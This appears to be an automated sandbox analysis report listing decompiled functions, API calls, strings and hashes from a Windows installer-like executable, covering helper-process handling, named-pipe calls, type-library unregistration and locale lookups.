                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                    • API String ID: 3355656108-1243109208
                                                                    • Opcode ID: 39883d29d795098f418b7966fdcadf6d747d73cc4ff91dfa499128bca298669b
                                                                    • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                                    • Opcode Fuzzy Hash: 39883d29d795098f418b7966fdcadf6d747d73cc4ff91dfa499128bca298669b
                                                                    • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E006B740C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				struct HWND__* _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v28;
				struct HWND__* _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				WCHAR* _t41;
				intOrPtr _t42;
				int _t44;
				intOrPtr* _t54;
				void* _t68;
				intOrPtr _t80;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t118;

				_t118 = __fp0;
				_t106 = __esi;
				_t105 = __edi;
				_t88 = __ecx;
				_t87 = __ebx;
				_t108 = _t109;
				_t110 = _t109 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v48 = 0;
				_v44 = 0;
				_v20 = 0;
				_v8 = 0;
				_push(_t108);
				_push(0x6b75fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t110;
				E005C75E4( &_v20, __ebx, __ecx, __eflags);
				if(E0060D3B4(_v20, __ebx,  &_v8, __edi, __esi) == 0) {
					_push(_t108);
					_push( *[fs:eax]);
					 *[fs:eax] = _t110;
					E0060D8B0(0, _t87, _v8, __edi, __esi);
					_pop(_t104);
					_t88 = 0x6b746f;
					 *[fs:eax] = _t104;
				}
				_t41 = E0040B278(_v8);
				_t42 =  *0x6d68d0; // 0x0
				_t44 = CopyFileW(E0040B278(_t42), _t41, 0);
				_t113 = _t44;
				if(_t44 == 0) {
					_t80 =  *0x6cded8; // 0x6d5c28
					_t11 = _t80 + 0x208; // 0x0
					E006B68EC( *_t11, _t87, _t88, _t106, _t113);
				}
				SetFileAttributesW(E0040B278(_v8), 0x80);
				_v12 = E00414DA0(0, L"STATIC", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0);
				 *0x6d68fc = SetWindowLongW(_v12, 0xfffffffc, E006B6AB0);
				_push(_t108);
				_push(0x6b75c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t110;
				_t54 =  *0x6cdec4; // 0x6d579c
				SetWindowPos( *( *_t54 + 0x188), 0, 0, 0, 0, 0, 0x97);
				E005C6FB0(0, _t87,  &_v44, _t105, _t106);
				_v40 = _v44;
				_v36 = 0x11;
				_v32 = _v12;
				_v28 = 0;
				E004244F8(L"/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v40,  &_v24);
				_push( &_v24);
				E005C6E90( &_v48, _t87, _t106, 0);
				_pop(_t68);
				E0040B470(_t68, _v48);
				_v16 = E006B6998(_v8, _t87, _v24, _t105, _t106, _t118);
				do {
				} while (E006B6A74() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
				CloseHandle(_v16);
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(E006B75CA);
				return DestroyWindow(_v12);
			}


























                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740d
                                                                    0x006b740f
                                                                    0x006b7412
                                                                    0x006b7413
                                                                    0x006b7414
                                                                    0x006b7417
                                                                    0x006b741a
                                                                    0x006b741d
                                                                    0x006b7420
                                                                    0x006b7423
                                                                    0x006b7428
                                                                    0x006b7429
                                                                    0x006b742e
                                                                    0x006b7431
                                                                    0x006b7437
                                                                    0x006b7449
                                                                    0x006b744d
                                                                    0x006b7453
                                                                    0x006b7456
                                                                    0x006b7460
                                                                    0x006b7467
                                                                    0x006b7469
                                                                    0x006b746a
                                                                    0x006b746a
                                                                    0x006b747e
                                                                    0x006b7484
                                                                    0x006b748f
                                                                    0x006b7494
                                                                    0x006b7496
                                                                    0x006b7498
                                                                    0x006b749d
                                                                    0x006b74a3
                                                                    0x006b74a3
                                                                    0x006b74b6
                                                                    0x006b74e2
                                                                    0x006b74f5
                                                                    0x006b74fc
                                                                    0x006b74fd
                                                                    0x006b7502
                                                                    0x006b7505
                                                                    0x006b7517
                                                                    0x006b7525
                                                                    0x006b7533
                                                                    0x006b753b
                                                                    0x006b753e
                                                                    0x006b7545
                                                                    0x006b7548
                                                                    0x006b7559
                                                                    0x006b7561
                                                                    0x006b7565
                                                                    0x006b756d
                                                                    0x006b756e
                                                                    0x006b757e
                                                                    0x006b7581
                                                                    0x006b7586
                                                                    0x006b75a7
                                                                    0x006b75ae
                                                                    0x006b75b1
                                                                    0x006b75b4
                                                                    0x006b75c2

                                                                    APIs
                                                                      • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                      • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                                    • SetWindowLongW.USER32 ref: 006B74F0
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                                      • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                    • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                    • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                    • API String ID: 1779715363-1630723103
                                                                    • Opcode ID: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
                                                                    • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                                    • Opcode Fuzzy Hash: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
                                                                    • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 55%
                                                                    			E00625FC4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				intOrPtr _v8;
				long _v12;
				void* _v16;
				struct _OVERLAPPED _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _t83;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_t101 = _t100 + 0xffffffd8;
				_v40 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t99);
				_push(0x626202);
				_push( *[fs:eax]);
				 *[fs:eax] = _t101;
				 *(_v8 + 0x14) =  *(_v8 + 0x14) + 1;
				 *(_v8 + 0x20) =  *(_v8 + 0x14);
				 *((intOrPtr*)(_v8 + 0x24)) = __edx;
				 *((intOrPtr*)(_v8 + 0x28)) = __ecx;
				_t83 = 0xc + __ecx;
				_push(_t99);
				_push(0x6261a7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t101;
				_v16 = CreateEventW(0, 0xffffffff, 0, 0);
				if(_v16 == 0) {
					E0060CE84(L"CreateEvent");
				}
				_push(_t99);
				_push(0x62613c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t101;
				E00407760( &_v36, 0x14);
				_v36.hEvent = _v16;
				if(TransactNamedPipe( *(_v8 + 0xc), _v8 + 0x20, _t83, _v8 + 0x4034, 0x14,  &_v12,  &_v36) != 0) {
					_pop(_t94);
					 *[fs:eax] = _t94;
					_push(E00626143);
					return CloseHandle(_v16);
				} else {
					if(GetLastError() != 0x3e5) {
						E0060CE84(L"TransactNamedPipe");
					}
					_push(_t99);
					_push(0x62610e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t101;
					if(_a4 != 0 &&  *((short*)(_v8 + 0x1a)) != 0) {
						do {
							 *((intOrPtr*)(_v8 + 0x18))();
						} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
					}
					_pop( *[fs:0x0]);
					_push(E00626115);
					GetOverlappedResult( *(_v8 + 0xc),  &_v36,  &_v12, 0xffffffff);
					return GetLastError();
				}
			}














                                                                    0x00625fc5
                                                                    0x00625fc7
                                                                    0x00625fcf
                                                                    0x00625fd2
                                                                    0x00625fd5
                                                                    0x00625fda
                                                                    0x00625fdb
                                                                    0x00625fe0
                                                                    0x00625fe3
                                                                    0x00625fe9
                                                                    0x00625ff5
                                                                    0x00625ffb
                                                                    0x00626001
                                                                    0x00626009
                                                                    0x0062600d
                                                                    0x0062600e
                                                                    0x00626013
                                                                    0x00626016
                                                                    0x00626026
                                                                    0x0062602d
                                                                    0x00626034
                                                                    0x00626034
                                                                    0x0062603b
                                                                    0x0062603c
                                                                    0x00626041
                                                                    0x00626044
                                                                    0x00626051
                                                                    0x00626059
                                                                    0x00626085
                                                                    0x00626127
                                                                    0x0062612a
                                                                    0x0062612d
                                                                    0x0062613b
                                                                    0x0062608b
                                                                    0x00626095
                                                                    0x0062609c
                                                                    0x0062609c
                                                                    0x006260a3
                                                                    0x006260a4
                                                                    0x006260a9
                                                                    0x006260ac
                                                                    0x006260b3
                                                                    0x006260bf
                                                                    0x006260c5
                                                                    0x006260dc
                                                                    0x006260bf
                                                                    0x006260e1
                                                                    0x006260eb
                                                                    0x00626101
                                                                    0x0062610d
                                                                    0x0062610d

                                                                    APIs
                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                    • API String ID: 2182916169-3012584893
                                                                    • Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                                    • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                                    • Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                                    • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0040DF90(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40e094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x6d1c14);
				if(_t28 !=  *0x6d1c2c) {
					LeaveCriticalSection(0x6d1c14);
					E0040A1C8(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x6d1c10 == 0) {
							_t18 = E0040DC78(_t28, _t28, _t44, __edi, _t44);
							L00405254();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E0040B470(_t44, E0040E0AC);
								}
								L00405254();
								E0040DC78(_t18, _t28,  &_v8, _t42, _t44);
								E0040B470(_t44, _v8);
							}
						} else {
							E0040DE74(_t28, _t44);
						}
					}
					EnterCriticalSection(0x6d1c14);
					 *0x6d1c2c = _t28;
					E0040DAF8(0x6d1c2e, E0040B278( *_t44), 0xaa);
					LeaveCriticalSection(0x6d1c14);
				} else {
					E0040B318(_t44, 0x55, 0x6d1c2e);
					LeaveCriticalSection(0x6d1c14);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040E09B);
				return E0040A1C8( &_v8);
			}









                                                                    0x0040df90
                                                                    0x0040df93
                                                                    0x0040df95
                                                                    0x0040df96
                                                                    0x0040df97
                                                                    0x0040df99
                                                                    0x0040df9d
                                                                    0x0040df9e
                                                                    0x0040dfa3
                                                                    0x0040dfa6
                                                                    0x0040dfae
                                                                    0x0040dfba
                                                                    0x0040dfe1
                                                                    0x0040dfe8
                                                                    0x0040dffa
                                                                    0x0040e003
                                                                    0x0040e014
                                                                    0x0040e019
                                                                    0x0040e021
                                                                    0x0040e026
                                                                    0x0040e02f
                                                                    0x0040e02f
                                                                    0x0040e034
                                                                    0x0040e03c
                                                                    0x0040e046
                                                                    0x0040e046
                                                                    0x0040e005
                                                                    0x0040e009
                                                                    0x0040e009
                                                                    0x0040e003
                                                                    0x0040e050
                                                                    0x0040e055
                                                                    0x0040e06f
                                                                    0x0040e079
                                                                    0x0040dfbc
                                                                    0x0040dfc8
                                                                    0x0040dfd2
                                                                    0x0040dfd2
                                                                    0x0040e080
                                                                    0x0040e083
                                                                    0x0040e086
                                                                    0x0040e093

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                                    • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                                    • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                                    • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                                    • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-US,en,
                                                                    • API String ID: 975949045-3579323720
                                                                    • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                    • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                                    • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                    • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00624704, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 25%
                                                                    			E00624704(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr* _t30;
				intOrPtr _t33;
				intOrPtr* _t37;
				intOrPtr* _t49;
				intOrPtr _t61;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t70;
				intOrPtr _t71;

				_t70 = _t71;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t68 = __eax;
				_push(_t70);
				_push(0x62481e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71;
				_t66 = E00414020(__ebx, _t68, GetModuleHandleW(L"OLEAUT32.DLL"), L"UnRegisterTypeLib");
				_t49 = _t66;
				if(_t66 == 0) {
					E0060CE84(L"GetProcAddress");
				}
				E005C52C8(_t68,  &_v20, _t70);
				E0040B368( &_v8, _v20);
				_push(E0040EC28( &_v12));
				_t28 = E0040AEF4(_v8);
				_push(_t28);
				L0043C244();
				if(_t28 != 0) {
					E0060CE98(L"LoadTypeLib", _t49, _t28, _t68);
				}
				_push( &_v16);
				_t30 = _v12;
				_push(_t30);
				if( *((intOrPtr*)( *_t30 + 0x1c))() != 0) {
					E0060CE98(L"ITypeLib::GetLibAttr", _t49, _t32, _t68);
				}
				_push(_t70);
				_push(0x6247f1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t71;
				_t33 = _v16;
				_push( *((intOrPtr*)(_t33 + 0x14)));
				_push( *((intOrPtr*)(_t33 + 0x10)));
				_push( *(_t33 + 0x1a) & 0x0000ffff);
				_push( *(_t33 + 0x18) & 0x0000ffff);
				_push(_t33);
				if( *_t49() != 0) {
					E0060CE98(L"UnRegisterTypeLib", _t49, _t34, _t68);
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_t37 = _v12;
				return  *((intOrPtr*)( *_t37 + 0x30))(_t37, _v16, E006247F8);
			}

















                                                                    0x00624705
                                                                    0x00624709
                                                                    0x0062470a
                                                                    0x0062470b
                                                                    0x0062470c
                                                                    0x0062470d
                                                                    0x0062470e
                                                                    0x00624710
                                                                    0x00624714
                                                                    0x00624715
                                                                    0x0062471a
                                                                    0x0062471d
                                                                    0x00624735
                                                                    0x00624737
                                                                    0x0062473b
                                                                    0x00624742
                                                                    0x00624742
                                                                    0x0062474c
                                                                    0x00624757
                                                                    0x00624764
                                                                    0x00624768
                                                                    0x0062476d
                                                                    0x0062476e
                                                                    0x00624775
                                                                    0x0062477e
                                                                    0x0062477e
                                                                    0x00624786
                                                                    0x00624787
                                                                    0x0062478a
                                                                    0x00624792
                                                                    0x0062479b
                                                                    0x0062479b
                                                                    0x006247a2
                                                                    0x006247a3
                                                                    0x006247a8
                                                                    0x006247ab
                                                                    0x006247ae
                                                                    0x006247b4
                                                                    0x006247b8
                                                                    0x006247bd
                                                                    0x006247c2
                                                                    0x006247c3
                                                                    0x006247c8
                                                                    0x006247d1
                                                                    0x006247d1
                                                                    0x006247d8
                                                                    0x006247db
                                                                    0x006247e7
                                                                    0x006247f0

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0062481E,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0062A1C5,00000000,0062A1D9), ref: 0062472A
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062476E
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                    • API String ID: 1914119943-2711329623
                                                                    • Opcode ID: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
                                                                    • Instruction ID: 47cd072b4b06506b06a7a0fd2e311c11a36de303591e536be68bff5c72022a6e
                                                                    • Opcode Fuzzy Hash: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
                                                                    • Instruction Fuzzy Hash: 19219171610A146FDB14EFA9EC42D6B77EEEF897407124469F410D3291EF78EC008B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E005C7FF4(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x5c80ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E00414020(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E00429D18() != 2) {
						if(E005C7A14(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E005C793C();
							RegCloseKey(_v12);
						}
					} else {
						if(E005C7A14(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E005C793C();
							RegCloseKey(_v12);
						}
					}
					E0040B4C8( &_v20, _v8, 0x5c8204);
					E00407870(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E005C80F5);
				E0040A1C8( &_v20);
				return E0040A1C8( &_v8);
			}










                                                                    0x005c7ffa
                                                                    0x005c7ffd
                                                                    0x005c8000
                                                                    0x005c8005
                                                                    0x005c8006
                                                                    0x005c800b
                                                                    0x005c800e
                                                                    0x005c8021
                                                                    0x005c8028
                                                                    0x005c803b
                                                                    0x005c8090
                                                                    0x005c809d
                                                                    0x005c80a6
                                                                    0x005c80a6
                                                                    0x005c803d
                                                                    0x005c8058
                                                                    0x005c8065
                                                                    0x005c806e
                                                                    0x005c806e
                                                                    0x005c8058
                                                                    0x005c80b6
                                                                    0x005c80c1
                                                                    0x005c80cc
                                                                    0x005c80cc
                                                                    0x005c802a
                                                                    0x005c802a
                                                                    0x005c802c
                                                                    0x005c80d2
                                                                    0x005c80d5
                                                                    0x005c80d8
                                                                    0x005c80e0
                                                                    0x005c80ed

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
